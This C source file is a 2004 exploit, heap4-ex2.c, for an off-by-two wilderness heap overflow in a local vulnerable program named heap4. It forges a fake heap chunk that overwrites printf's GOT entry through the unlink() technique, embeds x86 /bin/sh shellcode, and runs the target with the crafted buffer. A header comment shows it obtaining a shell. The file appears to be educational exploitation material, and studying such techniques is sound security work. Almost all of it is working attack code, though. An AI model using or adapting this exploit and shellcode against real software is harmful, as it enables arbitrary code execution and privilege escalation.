/*
 * $Id: heap4-ex2.c,v 1.1.1.1 2004/05/29 14:15:05 raptor Exp $
 *
 * heap4-ex2.c - heap4.c exploit (wilderness off-by-two)
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit uses the heap-to-stack unlink() technique to exploit an
 * off-by-two wilderness heap overflow. See the paper "Exploiting the 
 * wilderness" by Phantasmal Phantasmagoria for an in-depth description of 
 * this technique (http://seclists.org/lists/vuln-dev/2004/Feb/0025.html).
 *
 * For some reason, the off-by-one overflow as described by Phantasmal
 * Phantasmagoria doesn't appear to suffice to forge a size field able
 * to trigger the call to the unlink() macro, at least on the systems
 * i've tried. 
 *
 * Tested on both vanilla Linux and Linux/Openwall systems.
 *
 * Buffer structure:
 * [printf_addr - 12] [ret] [sc] ["A"s] [prev_size] | [0x02] [0x02]
 *
 * raptor@dns:~/devel$ uname -a
 * Linux dns 2.2.26-ow1 #1 Tue Mar 2 10:22:13 CET 2004 i686 unknown
 * raptor@dns:~/devel$ gcc --version
 * 2.95.3
 * raptor@dns:~/devel$ ./heap4-ex2
 * Using ret address       : 0x8049680
 * Using printf() address  : 0x80495ac
 * Using vuln buf address  : 0x8049678
 * Using argv[1] address   : 0xbffff961
 * Using special prev_size : 1208262935
 * 
 * sh-2.05$ 
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define	VULN		"./heap4"	// the vulnerable program
#define BUFSIZE		1022 + 1	// max size of the evil buf
#define PRINTF		0x080495ac	// printf() address in .got
#define	MALLOC		0x08049678	// address of the vuln buf
#define	ARGV1		0xbffff961	// address of the argv[1]

char sc[] = /* linux/x86 shellcode (12 + 24 = 36 bytes) */
"\xeb\x0aWHO_CARES?"
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE];
	char	*p = buf;

	int	printf_addr = PRINTF;
	int	ret = MALLOC + 8;

	/*
	 * set up the special prev_size field: we actually wanna end up
	 * pointing to the stack, exactly 8 bytes before argv[1] to ensure 
	 * the fd and bk are hit right, so we add 8 before complementing.
	 */
	int	prev_size = -(ARGV1 - (MALLOC + (1020 - 4))) + 8;

	/* prepare the evil buffer */
	memset(buf, 'A', sizeof(buf));
	buf[sizeof(buf) - 1] = 0x0;

	/* fd field of the fake chunk in stack */
	*((void **)p) = (void *)(printf_addr - 12);
	p += 4;

	/* bk field of the fake chunk in stack */
	*((void **)p) = (void *)(ret);
	p += 4;

	/* copy the shellcode */
	memcpy(p, sc, sizeof(sc) - 1);

	/* padding */
	p += (1020 - 4) - 8;

	/* prev_size field of the wilderness */
	*((void **)p) = (void *)(prev_size);
	p += 4;

	/* two-bytes overflow */
	*p++ = 0x02;
	*p++ = 0x02;

	/* print some output */
	fprintf(stderr, "Using ret address\t: %p\n", ret);
	fprintf(stderr, "Using printf() address\t: %p\n", printf_addr);
	fprintf(stderr, "Using vuln buf address\t: %p\n", MALLOC);
	fprintf(stderr, "Using argv[1] address\t: %p\n", ARGV1);
	fprintf(stderr, "Using special prev_size\t: %d\n\n", prev_size);

	/* run the vulnerable program */
	execl(VULN, VULN + 2, buf, NULL);
	perror("execl");
}
